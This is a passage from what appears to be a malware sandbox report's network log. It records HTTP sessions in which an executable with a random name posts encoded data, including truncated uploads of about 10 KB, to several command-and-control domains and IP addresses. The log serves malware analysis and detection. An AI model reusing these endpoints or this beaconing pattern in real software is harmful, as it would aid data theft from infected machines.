                                                                                      12    192.168.2.4    49854    74.48.143.82    80    4544    C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                      Nov 24, 2024 08:10:46.991288900 CET    460    OUT    GET /mlxg/?3vNdCBvX=cQzZIkxePH03UbtTShzK+VL4o2HqQJS38l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrbeJFZzqSBCnp1w20sGwly8q3n1+yWGeN50w=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.bpgroup.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:10:48.200839996 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 1251
                                                                                      date: Sun, 24 Nov 2024 07:10:48 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                      Nov 24, 2024 08:10:48.200902939 CET  253                IN
                                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      13          192.168.2.4  49870        13.248.169.48   80                4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:10:53.836222887 CET  731                OUT        POST /dash/ HTTP/1.1
                                                                                      Host: www.fortevision.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.fortevision.xyz
                                                                                      Referer: http://www.fortevision.xyz/dash/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=VOvhtrAHAUQdisOXZNLjcKKd0sfO2JBSaHER2T3cSKjvRvVgJltuEDoBQhx1oeAh1/HN3r9PyGYPpjYO3gNPju9jUJSDD9I2v/j0+5cuxFU/u93ix4qaeeeSXPuPs8h2zffxZrWvtcYOT3YL1eSGydszefB6WKt7tA0IJpqRU92Ww4BUxje7dk7mNP+NGi1kDg==


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      14          192.168.2.4  49880        13.248.169.48   80                4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:10:56.509388924 CET  751                OUT        POST /dash/ HTTP/1.1
                                                                                      Host: www.fortevision.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.fortevision.xyz
                                                                                      Referer: http://www.fortevision.xyz/dash/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZSfzvRKpgIgBuFDoBYBxw3uBv14Pz3p5PyG8Ppm8OwTlOge9hNZSWeNI2v/j0+98ExFc/uJzi3teZdeeNUPuPnchyzfekZpuVtewOT2oL1vSF9dspAvAxX7AtoDluUIKmZM+c4eMOgS/sPkfVQI35LhItYmc7qJLf/1P9ZaACEG3va7c=


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      15          192.168.2.4  49886        13.248.169.48   80                4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:10:59.182293892 CET  10833              OUT        POST /dash/ HTTP/1.1
                                                                                      Host: www.fortevision.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.fortevision.xyz
                                                                                      Referer: http://www.fortevision.xyz/dash/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX= [TRUNCATED]


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      16          192.168.2.4  49893        13.248.169.48   80                4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:11:01.849385023 CET  463                OUT        GET /dash/?etx=BXy4elO0X&3vNdCBvX=YMHBudoHIUxH+uWIVKjvQ5iF9tPwkJokcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q0LUsa6Gef/JbuNbn4M13wkoCvJOzh8OnTqA= HTTP/1.1
                                                                                      Host: www.fortevision.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:11:03.029344082 CET  398                IN         HTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Sun, 24 Nov 2024 07:11:02 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 258
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?etx=BXy4elO0X&3vNdCBvX=YMHBudoHIUxH+uWIVKjvQ5iF9tPwkJokcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q0LUsa6Gef/JbuNbn4M13wkoCvJOzh8OnTqA="}</script></head></html>


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      17          192.168.2.4  49909        103.21.221.87   80                4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:11:09.352554083 CET  746                OUT        POST /mv7p/ HTTP/1.1
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=0VM7/Aofdi5OaTSScjB0uZEl8WMvNBgSn8J69nEY2FX4hwqDDmNtmVHq4+8FYTNS16G+ED0rVvtnygwzk+CQL4crKZkpLaWxGkOL4S4FpZkIYeSg/8pv/XXb2OoiTZElI8R8LFKffKjZdmMOIAbIzhw4/HbKk+cRiSluSaQtoXf52ePJE+g3uc3YyZPydB0v/w==
                                                                                      Nov 24, 2024 08:11:10.900155067 CET  1033               IN         HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Sun, 24 Nov 2024 07:11:10 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      18          192.168.2.4  49917        103.21.221.87   80                4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:11:12.029685020 CET  766                OUT        POST /mv7p/ HTTP/1.1
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI2w/4hVWDSSRtnVHqgO9uXzM/16KIEBgrVv5nyhAzkJ2RJoctB5krT6WxGkOL4S8/pfMIZuig/eBsjnXEieoiZ5FuI8ReLEW5fIrZdjoOISjL6hw+wnaz0s9Zr3F6dME11XLnzYCTVPBg8cTrveGGQCJmk/w2/YthTxVckfiOFnLNsWA=
                                                                                      Nov 24, 2024 08:11:13.628062010 CET  1033               IN         HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Sun, 24 Nov 2024 07:11:13 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      19          192.168.2.4  49924        103.21.221.87   80                4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:11:14.697859049 CET  10848              OUT        POST /mv7p/ HTTP/1.1
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX= [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      20 | 192.168.2.4 | 49931 | 103.21.221.87 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:11:17.361005068 CET | 468 | OUT | GET /mv7p/?3vNdCBvX=5Xkb80UCbQYKeySKU05ZgY0hyXkWVD4R8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOGKEDCrVhSay3c3WH5ydFiaohW8mA4vlt7iA=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:11:18.959041119 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Sun, 24 Nov 2024 07:11:18 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      21 | 192.168.2.4 | 49952 | 8.210.46.21 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:11:26.421331882 CET | 728 | OUT | POST /cm9a/ HTTP/1.1
                                                                                      Host: www.prhmcjdz.tokyo
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.prhmcjdz.tokyo
                                                                                      Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=NtlY11u8ww8yv1Zk9AyOEZFMJNKfaJh636DIorNi/Yo5TNS9hdtsGPvMjxzA/U3Qgx3gYINsVJVpTBW7dZ22kRTcuPyncmjUeWe+N+opIDdaA2ni0/lbzcnnvSr9AWylJopKdbCEWOAqhkZUtHfKzXdbcb/4RMB6o2wFZzMR8Sh81yIDk9BOei3M6K+iLGiD0Q==
                                                                                      Nov 24, 2024 08:11:27.981043100 CET | 508 | IN | HTTP/1.1 200
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:11:27 GMT
                                                                                      Content-Type: application/json;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Origin
                                                                                      Vary: Access-Control-Request-Method
                                                                                      Vary: Access-Control-Request-Headers
                                                                                      Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      22 | 192.168.2.4 | 49958 | 8.210.46.21 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:11:29.093018055 CET | 748 | OUT | POST /cm9a/ HTTP/1.1
                                                                                      Host: www.prhmcjdz.tokyo
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.prhmcjdz.tokyo
                                                                                      Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=NtlY11u8ww8yvVpku3mOUJFDKNKfDZh+36HIopgn/Lc5Sou9iZ5sTPvM7hzF7U3fgx6TYIhsVIxpTBG7dOi3+hTe7/y5SGjUeWe+N+tyIDFaAF/i1b5a/8nk+Sr9EWzsJopodauqWN4qhkpUsSrFmndZS7/maMkBgHMRZ1MRjh965UFZ1MgZMiT/nN3WGFfKvcXpZEzp8dgcaHRCU/dWdvw=
                                                                                      Nov 24, 2024 08:11:30.667376995 CET | 508 | IN | HTTP/1.1 200
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:11:30 GMT
                                                                                      Content-Type: application/json;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Origin
                                                                                      Vary: Access-Control-Request-Method
                                                                                      Vary: Access-Control-Request-Headers
                                                                                      Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      23 | 192.168.2.4 | 49965 | 8.210.46.21 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:11:31.761451006 CET | 10830 | OUT | POST /cm9a/ HTTP/1.1
                                                                                      Host: www.prhmcjdz.tokyo
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.prhmcjdz.tokyo
                                                                                      Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX= [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      24 | 192.168.2.4 | 49972 | 8.210.46.21 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:11:34.426321983 CET | 462 | OUT | GET /cm9a/?etx=BXy4elO0X&3vNdCBvX=AvN42DnS9Qw3kn1S+XKBV+xTI9DBYK88wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvqBbKt/3mV1eMDkmtL8V6ExRSF03F7PAG84A= HTTP/1.1
                                                                                      Host: www.prhmcjdz.tokyo
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:11:36.002583027 CET | 427 | IN | HTTP/1.1 200
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:11:35 GMT
                                                                                      Content-Type: application/json;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Origin
                                                                                      Vary: Access-Control-Request-Method
                                                                                      Vary: Access-Control-Request-Headers
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Cache: MISS
                                                                                      Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      25 | 192.168.2.4 | 49991 | 203.161.43.228 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:11:41.601778984 CET | 725 | OUT | POST /6urf/ HTTP/1.1
                                                                                      Host: www.connecty.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.connecty.live
                                                                                      Referer: http://www.connecty.live/6urf/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=o8IUFI7bomKMG+ppM94r1nEqrBcUxyf6+lAh5q77VB57VQlICnJTcqR29hVU0QlOQdRN0DTyIyUHETwRvdjd1vIH9TRRd542in6KJ6KTaf1cv7X1I/eIguO3npy73Yxx04SAmR6FPEKvNMDAFFEOphKkjn83v5yneQfohn5xmShVC9UQzRJL2GCvbtpn3WXlKQ==
                                                                                      Nov 24, 2024 08:11:42.908219099 CET | 658 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:11:42 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 514
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      26 | 192.168.2.4 | 49997 | 203.161.43.228 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:11:44.343024969 CET | 745 | OUT | POST /6urf/ HTTP/1.1
                                                                                      Host: www.connecty.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.connecty.live
                                                                                      Referer: http://www.connecty.live/6urf/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
